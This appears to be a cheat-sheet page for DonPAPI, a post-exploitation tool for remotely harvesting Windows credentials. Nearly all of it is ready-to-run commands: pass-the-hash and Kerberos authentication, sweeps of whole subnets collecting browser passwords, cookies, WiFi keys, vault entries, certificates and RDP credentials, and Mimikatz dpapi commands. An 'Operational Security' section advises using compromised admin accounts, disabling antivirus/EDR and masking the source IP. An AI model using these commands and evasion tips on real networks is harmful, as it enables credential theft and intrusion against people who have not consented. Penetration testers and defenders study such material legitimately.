DonPAPI
DonPAPI is a post-exploitation framework for remotely harvesting Windows credentials and secrets via DPAPI without touching LSASS. It extracts browser passwords, WiFi keys, vault credentials, and certificates from target machines over the network.
Installation
섹션 제목: “Installation”Install from PyPI:
pip install donpapiInstall from source:
git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
pip install -r requirements.txt
python donpapi.py --helpRequires Python 3.8+, Impacket, and Windows domain credentials for remote access.
Quick Start
섹션 제목: “Quick Start”Basic usage with password authentication:
donpapi -d DOMAIN -u USERNAME -p PASSWORD 192.168.1.100Single IP with domain admin account:
donpapi -d contoso.com -u admin -p 'P@ssw0rd!' 10.0.0.50Against multiple targets:
donpapi -d domain.com -u user -p pass 10.0.0.0/24Authentication Methods
섹션 제목: “Authentication Methods”Password Authentication
섹션 제목: “Password Authentication”donpapi -d DOMAIN -u USERNAME -p PASSWORD TARGET
donpapi -d corp -u jdoe -p 'MyPassword123!' 192.168.1.100NTLM Hash (Pass-the-Hash)
섹션 제목: “NTLM Hash (Pass-the-Hash)”donpapi -d DOMAIN -u USERNAME -H NTHASH TARGET
donpapi -d corp -u admin -H 8846f7eaee8fb117ad06bdd830b7586c 10.0.0.50Kerberos Authentication
섹션 제목: “Kerberos Authentication”donpapi -d DOMAIN -u USERNAME -k TARGET
export KRB5CCNAME=/tmp/user.ccache
donpapi -d corp -u jdoe -k 192.168.1.100AES Key Authentication
섹션 제목: “AES Key Authentication”donpapi -d DOMAIN -u USERNAME -aesKey AESKEY TARGET
donpapi -d corp -u user -aesKey abc123def456... 10.0.0.100Current Session (LUID/Session Token)
섹션 제목: “Current Session (LUID/Session Token)”donpapi -luid TOKEN TARGET
donpapi -luid 0x12345:0x6789abc 192.168.1.100Target Specification
섹션 제목: “Target Specification”Single IP Address
섹션 제목: “Single IP Address”donpapi -d domain.com -u admin -p pass 192.168.1.100CIDR Range
섹션 제목: “CIDR Range”donpapi -d domain.com -u admin -p pass 192.168.1.0/24
donpapi -d domain.com -u admin -p pass 10.0.0.0/16Targets from File
섹션 제목: “Targets from File”donpapi -d domain.com -u admin -p pass -tf targets.txttargets.txt format (one per line):
192.168.1.100
192.168.1.101
192.168.1.102
10.0.0.50Target IP Override
섹션 제목: “Target IP Override”donpapi -d domain.com -u admin -p pass --target-ip 192.168.1.100 hostnameWhat It Collects
섹션 제목: “What It Collects”Browser Credentials
섹션 제목: “Browser Credentials”Extracts cached passwords and stored credentials from:
# Chrome/Chromium passwords and saved autofill
# Microsoft Edge passwords and autofill
# Firefox passwords (if encrypted with DPAPI)
# Opera, Brave, and other Chromium-based browsers| Browser | Passwords | Cookies | Autofill | Bookmarks |
|---|---|---|---|---|
| Chrome | Yes | Yes | Yes | No |
| Edge | Yes | Yes | Yes | No |
| Firefox | Yes | No | No | No |
| Opera | Yes | Yes | Yes | No |
| Brave | Yes | Yes | Yes | No |
WiFi Passwords
섹션 제목: “WiFi Passwords”Recovers stored wireless network credentials:
# All SSID names and pre-shared keys (PSK)
# Connection profiles with DPAPI encryption
# Requires domain backup key for decryptionWindows Vault Credentials
섹션 제목: “Windows Vault Credentials”Extracts stored credentials from Windows Credential Manager:
# Generic credentials (username/password pairs)
# Domain credentials
# Certificate-based credentials
# Session cookiesCertificate Data
섹션 제목: “Certificate Data”Harvests certificate-related secrets:
# Private keys
# Client certificates
# Server certificates
# Certificate thumbprintsRDP Connection History
섹션 제목: “RDP Connection History”Retrieves Remote Desktop credentials:
# Saved RDP connection passwords
# Connection metadata
# Server informationScheduled Task Credentials
섹션 제목: “Scheduled Task Credentials”Extracts credentials from scheduled tasks:
# Task-embedded usernames and passwords
# Run-as credentials
# Service account detailsCollection Methods
섹션 제목: “Collection Methods”Registry Access Over SMB
섹션 제목: “Registry Access Over SMB”# HKEY_CURRENT_USER registry hives remotely
# HKEY_LOCAL_MACHINE sensitive locations
# No local execution required
# SAM/SECURITY/SYSTEM hives for hash extractionProtected File Retrieval
섹션 제목: “Protected File Retrieval”# Copies protected files via SMB
# Browser database files
# Vault credential stores
# DPAPI protected filesStealthy vs. Mimikatz
섹션 제목: “Stealthy vs. Mimikatz”DonPAPI advantages over Mimikatz:
# No LSASS memory access required
# No code injection needed
# No process creation on target
# Remote execution only
# No antivirus hooks on LSASS
# Recoverable from disk artifacts
# Minimal memory footprintOutput and Reporting
섹션 제목: “Output and Reporting”Specify Output Directory
섹션 제목: “Specify Output Directory”donpapi -d domain.com -u admin -p pass -o /tmp/output 192.168.1.100Output Structure
섹션 제목: “Output Structure”output/
├── 192.168.1.100/
│ ├── Browser Credentials/
│ │ ├── chrome_passwords.txt
│ │ ├── edge_passwords.txt
│ │ └── firefox_logins.json
│ ├── Wifi/
│ │ └── wifi_passwords.txt
│ ├── Windows Vault/
│ │ └── vault_credentials.txt
│ ├── Windows Certificates/
│ │ └── certificates.pem
│ ├── RDP/
│ │ └── rdp_credentials.txt
│ └── report.htmlHTML Report
섹션 제목: “HTML Report”Automatically generated summary:
# Visual dashboard of recovered credentials
# Target overview and collection summary
# Credentials grouped by type
# Timeline of collection
# Export-ready formatsDatabase Export
섹션 제목: “Database Export”# SQLite database with all findings
# Searchable credential repository
# Machine-readable format
# Integration with credential managersFiltering Options
섹션 제목: “Filtering Options”Exclude Browser Credentials
섹션 제목: “Exclude Browser Credentials”donpapi -d domain.com -u admin -p pass --no-browser 192.168.1.100Exclude VNC Credentials
섹션 제목: “Exclude VNC Credentials”donpapi -d domain.com -u admin -p pass --no-vnc 192.168.1.100Exclude WiFi Passwords
섹션 제목: “Exclude WiFi Passwords”donpapi -d domain.com -u admin -p pass --no-wifi 192.168.1.100Exclude Sysadmin Accounts
섹션 제목: “Exclude Sysadmin Accounts”donpapi -d domain.com -u admin -p pass --no-sysadmins 192.168.1.100Selective Collection
섹션 제목: “Selective Collection”donpapi -d domain.com -u admin -p pass --filter browsers,wifi,vault 192.168.1.100
donpapi -d domain.com -u admin -p pass --filter certificates,rdp 192.168.1.100Combined Filtering
섹션 제목: “Combined Filtering”donpapi -d domain.com -u admin -p pass --no-browser --no-vnc --filter vault,wifi 10.0.0.0/24DPAPI Explained
섹션 제목: “DPAPI Explained”Windows DPAPI Overview
섹션 제목: “Windows DPAPI Overview”DPAPI (Data Protection API) is Windows’ built-in encryption mechanism:
# User-level keys: encrypted with user password
# Machine-level keys: encrypted with SYSTEM
# Domain backup key: allows domain admin decryption
# Master keys stored in user's profileDPAPI Master Keys
섹션 제목: “DPAPI Master Keys”Location and structure:
# User keys: C:\Users\USERNAME\AppData\Roaming\Microsoft\Protect\{SID}
# System keys: C:\Windows\System32\Microsoft\Protect\S-1-5-18
# Multiple master keys per user (created periodically)
# Protected by user's logon passwordDomain Backup Key Recovery
섹션 제목: “Domain Backup Key Recovery”# Domain admins can extract domain backup key
# Allows decryption of all domain user DPAPI secrets
# Stored in AD (msDS-KeyCredentialLink, etc.)
# Enables offline credential recoveryAdvanced Options
섹션 제목: “Advanced Options”Provide Domain Backup Key
섹션 제목: “Provide Domain Backup Key”donpapi -d domain.com -u admin -p pass --pvk domain_backup.pvk 192.168.1.100Specify Domain Controller IP
섹션 제목: “Specify Domain Controller IP”donpapi -d domain.com -u admin -p pass --dc-ip 10.0.0.10 192.168.1.100Custom Target IP
섹션 제목: “Custom Target IP”donpapi -d domain.com -u admin -p pass --target-ip 10.0.0.100 WORKSTATION01Port Specification
섹션 제목: “Port Specification”donpapi -d domain.com -u admin -p pass -ports 445,3389 192.168.1.100
donpapi -d domain.com -u admin -p pass --port 445 192.168.1.0/24Multithreaded Collection
섹션 제목: “Multithreaded Collection”donpapi -d domain.com -u admin -p pass --threads 10 192.168.1.0/24Verbose Logging
섹션 제목: “Verbose Logging”donpapi -d domain.com -u admin -p pass -v 192.168.1.100
donpapi -d domain.com -u admin -p pass -vv 192.168.1.100Troubleshooting
섹션 제목: “Troubleshooting”Connection Refused
섹션 제목: “Connection Refused”Check network connectivity and firewall:
# Verify SMB port 445 is open
# Confirm credentials are valid
# Check firewall rules on target
# Ensure target is reachableAccess Denied
섹션 제목: “Access Denied”Verify authentication credentials:
# Confirm username and password
# Check user has administrative rights
# Verify domain name is correct
# Test with different credential type (hash vs. password)No Credentials Found
섹션 제목: “No Credentials Found”Target may have limited secrets stored:
# User may not have browser passwords saved
# WiFi passwords only stored for currently connected network
# Check --no-* filters aren't excluding data
# Verify user has logged in and cached credentialsDPAPI Decryption Fails
섹션 제목: “DPAPI Decryption Fails”Cannot decrypt without proper keys:
# Domain backup key not available
# User password not correct
# DPAPI masterkey file corrupted
# Try with domain admin account for better accessSMB Enumeration Timeout
섹션 제목: “SMB Enumeration Timeout”Increase timeout for slow networks:
donpapi -d domain.com -u admin -p pass --timeout 30 192.168.1.100Best Practices
섹션 제목: “Best Practices”Operational Security
섹션 제목: “Operational Security”# Use domain admin or compromised admin account
# Filter unnecessary data collections (--no-browser if not needed)
# Disable antivirus/EDR temporarily if possible
# Run against specific targets, not blind scans
# Clean up output files after collection
# Use VPN/proxy to mask source IPCollection Strategy
섹션 제목: “Collection Strategy”# Target high-value systems first (servers, admin workstations)
# Prioritize domain controllers for backup key extraction
# Focus on service accounts with stored credentials
# Combine with credential validation tools
# Document all collected credentials safelyCredential Validation
섹션 제목: “Credential Validation”After collection, validate credentials:
# Test RDP credentials against target
# Verify domain account access
# Check WiFi connectivity
# Authenticate to discovered systems
# Prioritize credentials by privilege levelSafe Storage
섹션 제목: “Safe Storage”Protect harvested credentials:
# Store output directory on encrypted volume
# Restrict access to findings
# Use separate reporting machine
# Archive securely for cleanup
# Document chain of custodyRelated Tools
섹션 제목: “Related Tools”Mimikatz DPAPI Modules
섹션 제목: “Mimikatz DPAPI Modules”Extract DPAPI secrets with Mimikatz:
mimikatz.exe "dpapi::cred /in:C:\Users\user\AppData\Roaming\..."
mimikatz.exe "dpapi::masterkey /in:masterkey_file"
mimikatz.exe "dpapi::cache" # List cached DPAPI dataSharpDPAPI
섹션 제목: “SharpDPAPI”C# DPAPI extraction tool:
# Windows-native DPAPI exploitation
# Chromium-based browser password extraction
# Vault credential recovery
# RDP connection harvestingImpacket dpapi.py
섹션 제목: “Impacket dpapi.py”Python DPAPI utilities:
# Masterkey file parsing
# DPAPI secret decryption
# Domain backup key operations
# Cryptographic key extractionLaZagne
섹션 제목: “LaZagne”Multi-platform credential recovery:
# Browser password extraction
# VPN credential harvesting
# Mail client password recovery
# SSH key enumerationOther Credential Tools
섹션 제목: “Other Credential Tools”| Tool | Purpose | Stealth |
|---|---|---|
| Mimikatz | In-memory credential dumping | Low |
| procdump + pypykatz | Indirect LSASS dumping | Medium |
| Nirsoft tools | Cached credential recovery | Medium |
| SafetyKatz | Obfuscated Mimikatz variant | Medium |
| Credentials.ps1 | PowerShell credential module | High |